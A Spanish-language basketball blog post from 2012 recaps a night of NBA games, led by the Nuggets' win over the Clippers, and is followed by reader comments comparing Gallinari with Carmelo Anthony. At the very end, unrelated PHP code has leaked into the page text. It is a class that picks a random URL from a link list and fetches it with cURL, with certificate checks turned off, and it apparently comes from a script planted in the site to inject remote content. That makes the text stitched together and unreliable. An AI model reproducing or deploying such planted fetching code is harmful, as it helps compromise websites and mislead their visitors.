La Crónica: Los Nuggets noquean a los Clippers

03 de February de 2012 por txusma

Más que la propia jornada la noticia hoy es el anuncio de los 2 quintetos que competirán en el All-Star Game. En el Oeste saldrán de inicio Chris Paul, Kobe Bryant, Kevin Durant, Blake Griffin y Andrew Bynum mientras que el Este lo hará con Derrick Rose, Dwyane Wade, Carmelo Anthony, LeBron James y Dwight Howard.

Y no es que la jornada no fuera interesante. Los Nuggets rompieron la racha de 3 derrotas consecutivas frente los Clippers y lo hicieron con contundencia. En un tercer cuarto primoroso, los hombres de George Karl noquearon a Blake Griffin y compañía, y no solo en sentido figurado. Timofey Mozgov (que jugó un buen partido) cometió una dura falta sobre el chico maravilla que acabó con éste en el suelo. Con él, también se hundió su equipo (112-91). Danilo Gallinari volvió a ser el mejor de Denver, que se coloca, de nuevo, segundo del Oeste.

Las sorpresas del día corrieron a cargo de Warriors y, sobre todo, Kings. Los primeros, de la mano de unos brutales Stephen Curry y Monta Ellis, liquidaron a los Jazz con una tormenta de 119 puntos, el máximo que ha recibido el equipo de Corbin esta temporada (101-119). Los segundos se impusieron a los Blazers en un partido vibrante que el equipo de Oregon tuvo en su mano hasta el último segundo, pero falló 2 triples consecutivos que le podían haber dado la victoria (92-95).

En los otros partidos del día, victorias fáciles de San Antonio sobre New Orleans (81-93) y de Memphis sobre Atlanta (96-77, esta última a base de defensa, defensa y más defensa) y victoria de los Bulls frente los Knicks en un disputado partido (105-102) .

PREMIOS

MVP: La pareja Stephen CurryMonta Ellis se cargó a los Jazz con una actuación espectacular. 29 puntos, 12 asistencias, 5 rebotes y 3 robos del primero y 33 puntos y 3 robos del segundo. Y ambos con unos porcentajes de tiros más que buenos. Cuando juegan a este nivel son imparables.

Rookie: Iman Shumpert continúa de titular en los Knicks. Anoche aportó 10 puntos, 5 rebotes y 8 asistencias.

Sorpresa: Tal y como están las cosas que Amare Stoudamire anote 34 puntos y capture 11 rebotes es toda una sorpresa aunque mejor vamos a dejar que se lleve el último premio del día. En Sacramento, John Salmons apareció de vete tú a saber dónde para anotar 19 puntos y capturar 8 rebotes claves en la victoria de su equipo frente los Blazers. Y Jammal Tinsley salió de titular en los Jazz y se cascó una brillante actuación de 9 puntos, 6 rebotes y 13 asistencias. ¿Os acordabais de él?

Decepción: El banquillo de Utah solo fue capaz de anotar 4 canastas de 19 intentos. Mención especial para el 0 de 5 de Derrick Favors.

Esfuerzo en vano: Como ya hemos dicho, premio para Amare Stoudemire y su buena actuación en la derrota de los Knicks. También se lo ganó LaMarcus Aldridge, que perdió el partido a pesar de sus 28 puntos y 14 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

31 comentarios a esta entrada

  1. kantonyo dice:
    #1

    A dia de hoy ya podemos asegurar que Danilo Gallinari es un grande de esta liga. Top 20-25 para mi sin ninguna duda.

      Citar

  2. Ru dice:
    #2

    ¿Jarret Jack tiene algún problema por lesión o estaba tocado?Que veo en el box score “Coach’s decission” y si en New Orleans han visto que merece la pena apostar por Greivis Vazquez pueden conseguir algo aceptable por Jack ,hasta ahora estaba haciendo muy buenos números.Eso sí,timadas no,que por Kaman dan los Rockets Thabeet y Jordan Hill más algo más,las sobras…no me jodas(no soy el hijo de Stern que quede claro xDDD).

    Al final que hacemos con los Warriors,¿Curry y Ellis son compatibles?

      Citar

  3. simon dice:
    #3

    Compatibles son Ru, pero yo creo que los warriors podían ser mejores si hacen un buen trade con alguno de ellos ( preferiblemente Ellis ) a ver si este año tienen suerte en el sorteo del draft y se hacen con una buena pick y si eligen un 2/3 traspasar a Ellis por algun otro jugador estrella o por un par de buenos jugadores. y si eligen un 5 con futuro ( perdonar que no hable nombres concretos ) se que va a ser ( por lo que todos dicen ) una muy buena camada de Rookies pero solo conozco 2 o 3 ( y por lo que he leido de ellos ) aún no he visto en profundidad a ninguno ( en marzo llegará el momento ). Pero creo que si se dejan llevar y consiguen un pick alto con un poco de suerte pueden tener en un par de años si hacen las cosas bien un autentico equipazo. Los Warriors son uno de mis 2 o 3 equipos favoritos.

      Citar

  4. GreenPride dice:
    #4

    Esta temporada está siendo un poco loca. Los Clippers tras sus grandes actuaciones los últimos partidos van y se pegan el batacazo en casa y ante unos Nuggets que flojeaban en los últimos partidos. Sin duda que lo apretado del calendario es explicación para algunos de estos bandazos aunque no siempre.
    Viendo el nivel al que está jugando Gallinari y al que está jugando Melo y teniendo en cuenta el resto de jugadores involucrados en el traspaso ¿Estarán los Knicks más que arrepentidos de no haber esperado a que Melo terminara contrato y llegara gratis en vez de ese traspaso que les costó la mitad de sus buenos jugadores? Yo creo como ya expuse en su día que fue un error grave… uno más de la franquicia de la gran manzana. Aún así reconozco que no esperaba que fueran tan mal.

      Citar

  5. rumbero dice:
    #5

    Vaya leche de Mozgov. No me molan estos ajustes de cuentas. Si el año pasado te comiste un mate y saliste retratado en todos los highlights pues mala suerte amigo. O le devuelves el mate o le haces un señor tapón, pero ese ostión en la cara con la posterior caida sobra.

    Pero vaya, estos Nuggets estan dejando de ser sorpresa. No esperaba que sin Smith, Chandler y Martin estuvieran tan arriba, pero como siempre Karl sacando petróleo de lo que tiene. Muy grande Gallinari. Por otro lado era de esperar que los Clippers después de 3 partidos tan duros contra Memphis, Oklahoma y los propios Nuggets tuvieran un bajón.
    Sobre Ellis-Curry, seguramente sería mejor traspasar a uno de los dos para compensar más el equipo, pero, ¿y lo divertido que es cuando los dos estan afinados? Se revientan al más pintado

      Citar

  6. Jose Luis dice:
    #6

    Si lo que ha hecho Mozgov hoy lo hace en play-offs, diríamos que eso es defensa intensa y no permitir canastas fáciles. Tampoco me parece tanta ostia, se cae así porque quiere hacer el mate y se agarra del aro, no se agarra bien, y cae malamente.

      Citar

  7. HeiNeKeN dice:
    #7

    GreenPride:
    Viendo el nivel al que está jugando Gallinari y al que está jugando Melo y teniendo en cuenta el resto de jugadores involucrados en el traspaso ¿Estarán los Knicks más que arrepentidos de no haber esperado a que Melo terminara contrato y llegara gratis en vez de ese traspaso que les costó la mitad de sus buenos jugadores? Yo creo como ya expuse en su día que fue un error grave… uno más de la franquicia de la gran manzana. Aún así reconozco que no esperaba que fueran tan mal.

    Carmelo Anthony: 35.5 min, 23.8p, 6.5 reb 4.3 asis 1.2 rob 3.3 perdidas 40,3% TC 30,1% T3
    Danilo Gallinari: 33,5 min, 17.5p, 5.4 reb, 2.7 asis, 1.3 rob 1.6 perdidas 45.6% TC 33,3 % T3

    Así como yo decía que los Clippers no tenían que hacer el de Paul y ahí me tengo que tragar mis palabras.

    Pero con este, yo no habría hecho el traspaso, ya dije que no debían hacerlo cuando lo hiceron y ahora se ve a quien le fue mejor (Denver). Me sigue pareciendo una gran cagada, con lo bien que estaban jugando con Felton, Chandler y Gallinari, y si encima luego “regalas” a Billups… apaga y vamonos.

      Citar

  8. Blade Petrovic dice:
    #8

    Este año hay muchas decepciones Los lakers de Deer los magic de Denise los Knicks de Melo mis Dallas el lockout ha canviado muchas cosas

      Citar

  9. HisRoyalAirness dice:
    #9

    Oye, qué exageración lo de Mozgov, no? Es una falta normal, quiere impedirle el mate y que tire los libres, no me parece ninguna barbaridad. Qué haríais vosotros? Porque yo soy él y se la doy más fuerte aún para que, por mis huevos, se le quiten las ganas de matarme en la cara.

    Al final si que parece que nos estamos amariconando, esto en los 80 ni era noticia; sería una falta normal de Laimbeer.

      Citar

  10. HisRoyalAirness dice:
    #10

    kantonyo:
    A dia de hoy ya podemos asegurar que Danilo Gallinari es un grande de esta liga. Top 20-25 para mi sin ninguna duda.

    Para mí, ni por asomo.

    Para justificarlo voy a intentar hacer una lista de 25 mejores que él: Kobe, Lebron, Wade, Carmelo, Durant, Paul, Deron, Howard, Rose, Bosh, Rondo, Joe Johnson, Josh Smith, Lamarcus, Dirk, Pau, Marc, Love, Griffin, Nash (el que diga que no tendrá que vérselas conmigo), Westbrook, Randolph, Jennings, Ellis, Lowry, Rudy Gay, Harden, Tony Parker…
    Creo que incluso he puesto de más

      Citar

  11. Jose Luis dice:
    #11

    Jennings, Lowry y Parker me parecen por debajo, Harden, Gay y Ellis están igualados (para mi gusto, claro está)… no sé, es que un alero es difícil valorarlo, pero rebotea bien para su puesto, y en ataque es muy bueno, aunque en defensa flojee algo más. Top 25 puede que quizá no, pero top 30 seguro. Y ojo que ahí has dicho unos cuantos que este año… Nowitzki xD pero bueno, entiendo que quieras tener al alemán antes que al italiano. No sé, tampoco tiene mucha competencia en los Nuggets, y el estilo alegre y corredor de éstos quizá le favorezca.

      Citar

  12. Len Bias dice:
    #12

    A esos le sumamos a Stoudemire, Pierce, Allen, Duncan (sí, Duncan), Bynum, Granger y alguno más y se te va fuera del Top 25 fácil. Pero vamos, en mi opinión puede estar en un Top 40 seguramente, que en una liga de 30 equipos con 12-15 jugadores cada uno ya tiene su mérito.

      Citar

  13. Sancho88 dice:
    #13

    Gallinari es la sorpresa de los Nuggets, pero quien parte realmente el bacalao es George Karl. Todos están enchufados, Ha recuperado para la causa a Corey Brewer, está motivando al señor Al Harrington, que incluso últimamente defiende y todo. No sé, para mí es lo más destacable de los Nuggets, la unión como equipo por encima de las individualidades. Y además tienen buen royo en el banquillo.

    Y Jamaal Tinsley a mí me parecía un jugón en el año de rookie de Pau. De hecho, era su máxima amenaza por entonces, al lado del temible Kwame Brown, xd

      Citar

  14. HisRoyalAirness dice:
    #14

    Estoy hablando de nivel más o menos actual. Dirk no está en forma pero vamos, lo prefiero en mi equipo en silla de ruedas antes que a Gallinari.
    Jenings y Lowry no me gustan, pero son productivos.

    Y estáis hablando de un top 30-40…es una broma? Eso no existe, por favor. Porque entonces Samardo estará en un top 80 y podrá decirlo orgulloso a sus amigos

      Citar

  15. Denise dice:
    #15

    kantonyo:
    A dia de hoy ya podemos asegurar que Danilo Gallinari es un grande de esta liga. Top 20-25 para mi sin ninguna duda.

    Yo no estoy de acuerdo.

    Es un buen jugador, pero no para tanto. A veces maquilla bastante las estadísticas, sus % de tiro no son malos pero tampoco son excelentes, para todo lo grande que es y la minutada que juega no coge muchos rebotes, y su visión de juego es normalita. Top 50 .

    En la lista tampoco está Iguodala. Para mi, un auténtico crack. Algunos dicen que su sueldo es elevado, yo no lo creo, Anota, rebotea, asiste, tiene buen tiro, roba balones, defiende y la de intangibles que aporta ese muchacho. Si yo fuese Coach o GM, me encantaría tenerlo en mi equipo, de hecho lo escogí en mi 2º ronda de la Hoops de TJNBA, y no sé por qué la máquina no le dio la gana de aceptar mi fichaje. Todavia me da rabia de ello.

      Citar

  16. Kantonyo dice:
    #16

    Si he afirmado eso con rotundidad era para provocar que algunos sacaran una lista de jugadores y comparar.

    Parece difícil viendo esos jugadores que sea un top 25, pero creo que si lo está, ya que es el alma de los Nuggets, su jugador mas importante, en continuo crecimiento y su equipo es segundo en el difícil oeste.

    En este momento, repito, en este momento Gallinari está siendo más decisivo que Carmelo, Rondo, Gay, Stoudemite, Joe Johnson, Randolph, Parker, Duncan o Bosh por citar alguno de los que a largo plazo son mejores que el.

      Citar

  17. Ru dice:
    #17

    Ojito,según LA Times Kenyon Martin regresa a la NBA para vestir la camiseta de los Clippers firmando por la mini mild-level.Visto en hoopshype.Tela con los Clippers.

      Citar

  18. Txusma dice:
    #18

    Ru:
    Ojito,según LA Times Kenyon Martin regresa a la NBA para vestir la camiseta de los Clippers firmando por la mini mild-level.Visto en hoopshype.Tela con los Clippers.

    Y esta es la prueba de que el talento llama al talento (bueno si lo de Kenyon Martin se le puede considerar talento)

      Citar

  19. Kantonyo dice:
    #19

    Denise: Yo no estoy de acuerdo.

    Es un buen jugador, pero no para tanto. A veces maquilla bastante las estadísticas, sus % de tiro no son malos pero tampoco son excelentes, para todo lo grande que es y la minutada que juega no coge muchos rebotes, y su visión de juego es normalita. Top 50 .

    En la lista tampoco está Iguodala. Para mi, un auténtico crack. Algunos dicen que su sueldo es elevado, yo no lo creo, Anota, rebotea, asiste, tiene buen tiro, roba balones, defiende y la de intangibles que aporta ese muchacho. Si yo fuese Coach o GM, me encantaría tenerlo en mi equipo, de hecho lo escogí en mi 2º ronda de la Hoops de TJNBA, y no sé por qué la máquina no le dio la gana de aceptar mi fichaje.Todavia me da rabia de ello.

    Me cuesta creer que el mejor jugador de una franquicia que es la sorpresa de la liga sea un hace números.

      Citar

  20. Kantonyo dice:
    #20

    Ru:
    Ojito,según LA Times Kenyon Martin regresa a la NBA para vestir la camiseta de los Clippers firmando por la mini mild-level.Visto en hoopshype.Tela con los Clippers.

    A priori una gran incorporación. Aporta músculo en la zona, veremos como regresa de su aventura china. Tiene 34 años…

      Citar

  21. Esteban dice:
    #21

    No es justo hablar de gallo desp del pedazo de partido q se jugo anoche, quiza de los mejores de su carrera, mientras q melo viene de una lesion y hace partidos q no juega

    La sensacion de un momento tiene mucho q ver

    Mientras tomo con ilusion la llegada de martin a los clippers, y creo q les dara un salto de calidad, los clippers necesitan un alero suplewnte q pueda defender y tirar con consistencian quiza posey.. O no se alguien, y cambiar el expiring de foye por alguien q defienda mejor y q tenga mas fisico, morrow?
    Y antes q un grande en la zona, teniendo a evans y su fuerza, necesitan un interno que pueda dar puntos desde el banco, principalmente tiro a distancia q no tienen

      Citar

  22. melo15 dice:
    #22

    Decir que Gallinari es mejor y mas decisivo que Melo es una tonteria, Melo a su edad clasificaba a su equipo a playoffs, y es mejor jugador que el en casi todos los aspectos del juego

      Citar

  23. Esteban dice:
    #23

    Comparto con melo, si bien melo a mi entender no esta a la altura de las grandes figuras de la liga, sea lebron, kobe, wade etc, sigue estando un escalon por debajo, pero uno por ensima de tipos como gallinari, ellis, granger o etc

      Citar

  24. melo15 dice:
    #24

    Bueno no se que decir, si juega en serio, ya sabeis defendiendo y tal si que esta a la altura, pero como no lo hace habitualmente, sobre si kobe esta a la altura de Lebron James, no lo se esta tempoirada muy lider no esta siendo, ya que van 8 y el esta siendo muchisimo mas egoista que Melo

      Citar

  25. kantonyo dice:
    #25

    Melo15. No he dicho que Carmelo sea peor que Gallinari. Digo que en este momento Gallinari es una de las sensaciones de la liga, y en este mismo momento es más decisivo que Carmelo. Son cosas muy distintas.

    Carmelo es un jugador que a dia de hoy vive de las rentas de su pasado y de la eterna promesa de su gran talento.

      Citar

  26. Esteban dice:
    #26

    Kant no comparto contigo, melo nunca fue mas de lo q es ahora, siempre fue lo mismo, ahora esta volviendo de una lesion, pero siempre fue un tirador de los mejores e imparable en el uno contra uno con un sin fin de recursos, pero a la vez un pesimo defensor, holgazan para el rebote, horrible para las asistencias y un lider inestale

    Ahora esta mal por su lesion, pero a no olvidar sus 41 puntos y a12 rebotes enn PO en el garden, sin bog sjhoot y sin amare casi todo el partido, fallo el triple desicivo, justamennte en algo q es muy muy bueno

      Citar

  27. Sancho88 dice:
    #27

    Bueno, Kantonyo, el impacto de Gallinari es mayor que el de Anthony por lo que representa para su equipo, y porque los Nuggets están muy arriba. Pero ciértamente, la comparación es esa, por impacto, no por calidad individual y capacidad de decisión. Los Nuggets son un equipo con mayúsculas, con una gran dirección desde el banquillo a cargo de George Karl, y Gallinari es el puntal en ataque, pero como también lo pueden ser en muchos momentos del partido Lawson, Nené, Harrington, Brewer, Fernández… y sin embargo, en Nueva York ese concepto de equipo está por aparecer. Tampoco podemos echarle todas las culpa a Anthony. Es importante también que el entrenador sepa construir un equipo, no solo si un jugador es más líder o menos líder

      Citar

  28. Sancho88 dice:
    #28

    Esteban:
    No es justo hablar de gallo desp del pedazo de partido q se jugo anoche, quiza de los mejores de su carrera, mientras q melo viene de una lesion y hace partidos q no juega

    La sensacion de un momento tiene mucho q ver

    Mientras tomo con ilusion la llegada de martin a los clippers, y creo q les dara un salto de calidad, los clippers necesitan un alero suplewnte q pueda defender y tirar con consistencian quiza posey.. O no se alguien, y cambiar el expiring de foye por alguien q defienda mejor y q tenga mas fisico, morrow?
    Y antes q un grande en la zona, teniendo a evans y su fuerza, necesitan un interno que pueda dar puntos desde el banco, principalmente tiro a distancia q no tienen

    Pues sí, les sigue faltando un tirador, cuyo rol sea principalmente anotar desde el banquillo. Un jugador como John Salmons les vendría de perlas, ya que cuando se atasca Paul, o los triples no le entran a Mo Williams, el equipo se centra exclusivamente en las animaladas de Blake Griffin. Necesitan más equilibrio, y en la pintura con la llegada de Martin lo van a tener (qué recuerdos de lo gran jugador que fue en Nets), pero en el perímetro necesitan mucho más a Butler (declaro mi absoluta decepción por este jugador, y creo que no está ni a la mitad de altura como jugador de Paul y Griffin, por lo que me parece absurdo hablar de big three en Clippers), y otros jugadors que de momento no están apareciendo, como Randy Foye

      Citar

  29. simon dice:
    #29

    Pues ale, los Kings empaquetan al paquete de John Salmons le ponen un lacito y pa los Angeles a cambio de Bledsoe y Foye y tan contentos todos jjejeje. Salmons a lo unico que podria ayudar a los clippers ahora mismo sería a agitar toallas

      Citar

  30. Kantonyo dice:
    #30

    Esteban:
    Kant no comparto contigo, melo nunca fue mas de lo q es ahora, siempre fue lo mismo, ahora esta volviendo de una lesion, pero siempre fue un tirador de los mejores e imparable en el uno contra uno con un sin fin de recursos, pero a la vez un pesimo defensor, holgazan para el rebote, horrible para las asistencias y un lider inestale

    Ahora esta mal por su lesion, pero a no olvidar sus 41 puntos y a12 rebotes enn PO en el garden, sin bog sjhoot y sin amare casi todo el partido, fallo el triple desicivo, justamennte en algo q es muy muy bueno

    Yo creo que Melo siempre ha podido ser mas de lo que ha sido. Y yo en este foro siempre he sido defensor de Carmelo, pero el de Brooklyn siendo uno de los mejores de la liga en los últimos 10 años nunca ha llegado a ser lo que todos esperábamos que fuera. Su techo es mucho mas alto, y no tengo duda de que en talento le machaca a Gallinari. Y aunque el partido de Gallinari esta noche ha sido una castaña, en este momento Gallinari está siendo mas decisivo hasta el momento esta temporada.

      Citar

  31. Kantonyo dice:
    #31

    Sancho88:
    Bueno, Kantonyo, el impacto de Gallinari es mayor que el de Anthony por lo que representa para su equipo, y porque los Nuggets están muy arriba. Pero ciértamente, la comparación es esa, por impacto, no por calidad individual y capacidad de decisión. Los Nuggets son un equipo con mayúsculas, con una gran dirección desde el banquillo a cargo de George Karl, y Gallinari es el puntal en ataque, pero como también lo pueden ser en muchos momentos del partido Lawson, Nené, Harrington, Brewer, Fernández… y sin embargo, en Nueva York ese concepto de equipo está por aparecer. Tampoco podemos echarle todas las culpa a Anthony. Es importante también que el entrenador sepa construir un equipo, no solo si un jugador es más líder o menos líder

    Estoy totalmente de acuerdo en todo lo que dices, y eso prácticamente lo que defiendo. Muchas veces lo intangible se nos escapa en los análisis, y algo tendrá que ver el liderazgo de Gallinari en el éxito de Denver, a pesar del partido de ayer donde no tuvo su noche…. Le he sometido a demasiada presión al pobre …. Jajajaj

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>